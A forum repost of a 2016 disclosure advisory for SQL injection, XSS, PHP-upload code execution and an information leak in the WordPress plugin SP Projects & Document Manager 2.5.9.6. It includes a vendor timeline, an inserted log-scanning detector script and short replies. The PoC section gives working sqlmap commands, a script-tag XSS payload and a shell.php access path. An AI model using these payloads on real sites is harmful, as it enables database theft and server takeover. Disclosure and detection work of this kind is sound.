
WordPress SP Projects & Document Manager 2.5.9.6 XSS / SQL Injection


    Posted on 2016-3-9 10:43:01
    This post was last edited by 人=族 on 2016-3-10 10:26

    * Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
    * Discovery Date: 2016/01/13
    * Public Disclosure Date: 2016/03/06
    * Exploit Author: Michael Helwig
    * Contact: https://twitter.com/c0dmtr1x
    * Vendor Homepage: http://smartypantsplugins.com/
    * Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
    * Version: 2.5.9.6
    * Tested on: WordPress 4.4.1
    * Category: webapps

    Description
    ===============================================================================

    The WordPress plugin "SP Projects & Document Manager" contains several
    vulnerabilities: arbitrary file upload and code execution by registered users,
    SQL injections, information leakage and XSS by unregistered users.

    PoC
    ===============================================================================


    1. SQL-Injections
    ~~~~~~~~~~~~~~~~~~~

    Several SQL injections have been known in version 2.4.1 but have been fixed in between.
    At least two of them reappeared in version 2.5.9.6:

    - The injections in the "id"-parameter on
    http://wordpress.local.de/wp-con ... ment-manager/admin/
    ajax.php?function=download-project&id=1

    - and the POST-Parameter vendor_email on
    http://wordpress.local.de/wp-con ... ment-manager/admin/
    ajax.php?function=email-vendor

    See https://packetstormsecurity.com/files/129212/\
    WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
    for the original information on this.

    Both injections can be exploited by sqlmap:

    [1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
    -manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

    [2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
    -manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \
    OR (1=1 *" --dbms mysql



    2. Arbitrary code executions
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
    request to their specific location in the default upload path (which can vary
    depending on the configuration of the plugin). The URL to uploaded files typically
    looks like

    /wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]

    e.g.
    http://wordpress.local.de/wp-con ... nt-document-manager\
    /1/shell.php

    Files can even be accessed directly if the option "Require Login to Download"
    is checked in the plugin configuration.


    3. Information leakage
    ~~~~~~~~~~~~~~~~~~~~~~~

    Information about uploaded files can be retrieved by non-logged in users via a
    call to admin/ajax.php:

    -----------------------
    GET http://wordpress.local.de/wp-con ... nt-document-manager\
    /admin/ajax.php?function=get-file-info&id=1

    -- response --
    200 OK
    Date: Wed, 13 Jan 2016 22:17:46 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.14
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 211
    Connection: close
    Content-Type: application/json

    {"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\
    "cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\
    "form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
    ---------------

    Specifically you can retrieve info about the upload user id and filename
    to determine the URL for direct access to the file (see 3).

    4. XSS Vulnerability
    ~~~~~~~~~~~~~~~~~~~~~~~

    There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
    for function=email-vendor:

    ---------------
    POST http://wordpress.local.de/wp-con ... nt-document-manager\
    /admin/ajax.php?function=email-vendor
    Content-Type: application/x-www-form-urlencoded
    vendor_email[]=1&vendor=<script>alert(1);</script>

    -- response --
    200 OK
    Date: Sun, 06 Mar 2016 10:00:30 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.14
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 101
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    <p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\
    </script></p>
    ---------------


    Timeline
    ===============================================================================

    2016/01/13 - Issues discovered
    2016/01/14 - Issues reported to vendor via contact form on his website
    2016/01/27 - No response from vendor; WordPress security team notified
    2016/01/29 - Reply from WordPress security team
    2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed


    Solution
    ===============================================================================

    Update to latest version
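    All four issues in the advisory above surface as requests to a small set of fixed plugin paths, which makes them straightforward to look for in web-server logs after the fact. The following Python script is an added example (it is not part of the original post and not code from the plugin or its author): it parses Apache combined-format access-log lines and flags four patterns taken from the advisory: a non-numeric `id` sent to `function=download-project` (the SQL injection point), lookups via `function=get-file-info` (the information leak, which the advisory says works without login), POSTs to `function=email-vendor` (the second injection and the XSS sit in the POST body, which an access log does not record, so these are flagged for review rather than confirmed), and any PHP-like file fetched from under `/wp-content/uploads/sp-client-document-manager/` (the uploaded-shell path). The log lines are constructed for the example; the rule names and the `.phtml` extension (the advisory names `.php` and `.php5` "etc.") are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Paths taken from the advisory.
PLUGIN_AJAX = "/wp-content/plugins/sp-client-document-manager/admin/ajax.php"
UPLOAD_ROOT = "/wp-content/uploads/sp-client-document-manager/"
# .php and .php5 are named in the advisory; .phtml is an assumed extra variant.
PHP_EXT = re.compile(r"\.(php\d?|phtml)$", re.IGNORECASE)

# Apache combined log format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jan/2016:22:17:46 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1 HTTP/1.1" 200 512
203.0.113.5 - - [13/Jan/2016:22:18:02 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1%27%20OR%201%3D1-- HTTP/1.1" 200 512
198.51.100.7 - - [13/Jan/2016:22:19:10 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=get-file-info&id=1 HTTP/1.1" 200 211
198.51.100.7 - - [13/Jan/2016:22:19:31 +0000] "GET /wp-content/uploads/sp-client-document-manager/1/shell.php HTTP/1.1" 200 88
192.0.2.9 - - [06/Mar/2016:10:00:30 +0000] "POST /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor HTTP/1.1" 200 101
192.0.2.9 - - [06/Mar/2016:10:01:00 +0000] "GET /wp-content/uploads/sp-client-document-manager/2/report.pdf HTTP/1.1" 200 40960
"""


def parse_line(line):
    """Return a dict with ip, method, path, query (decoded) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes values, so "%27" becomes "'" before the checks below.
    entry["query"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return entry


def classify(entry):
    """Map one parsed request to the advisory-derived rule names it triggers."""
    hits = []
    path, query, method = entry["path"], entry["query"], entry["method"]
    if path == PLUGIN_AJAX:
        fn = query.get("function", "")
        if fn == "download-project" and not query.get("id", "").isdigit():
            # The plugin only expects a numeric id; anything else is an injection attempt.
            hits.append("sqli-download-project")
        elif fn == "get-file-info":
            # Leaks uploader id and filename to anyone; worth correlating with later upload fetches.
            hits.append("file-info-lookup")
        elif fn == "email-vendor" and method == "POST":
            # vendor_email[] injection and the vendor XSS are in the body, not in the log.
            hits.append("email-vendor-post")
    elif path.startswith(UPLOAD_ROOT) and PHP_EXT.search(path):
        # A PHP file being served from the upload directory is the code-execution path.
        hits.append("php-in-uploads")
    return hits


def scan(log_text):
    """Return (ip, rule, path) tuples for every flagged request in the log text."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in classify(entry):
            findings.append((entry["ip"], rule, entry["path"]))
    return findings


if __name__ == "__main__":
    for ip, rule, path in scan(SAMPLE_LOG):
        print(f"{ip:15} {rule:22} {path}")
```

    Run against a real log the same way (`scan(open(path).read())`); a `file-info-lookup` followed by a `php-in-uploads` hit from the same address is the sequence the advisory describes, and any `php-in-uploads` hit at all means the upload directory is still executing scripts and the update to 2.6.0.0 (or a server-side rule denying PHP execution under uploads) has not been applied.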
    Posted on 2016-3-9 10:50:02
    Let me see what it is

    Posted on 2016-3-9 11:38:45
    Let me see what it is

    Posted on 2016-3-9 13:49:30
    WordPress again, let me see what it is

    Posted on 2016-3-9 14:11:48
    wordpress

    Posted on 2016-3-9 14:57:13
    Learning this......

    Posted on 2016-3-9 16:37:07
    Chinese Honkers, for generations to come!

    Posted on 2016-3-9 20:42:48
    Have to reply again,,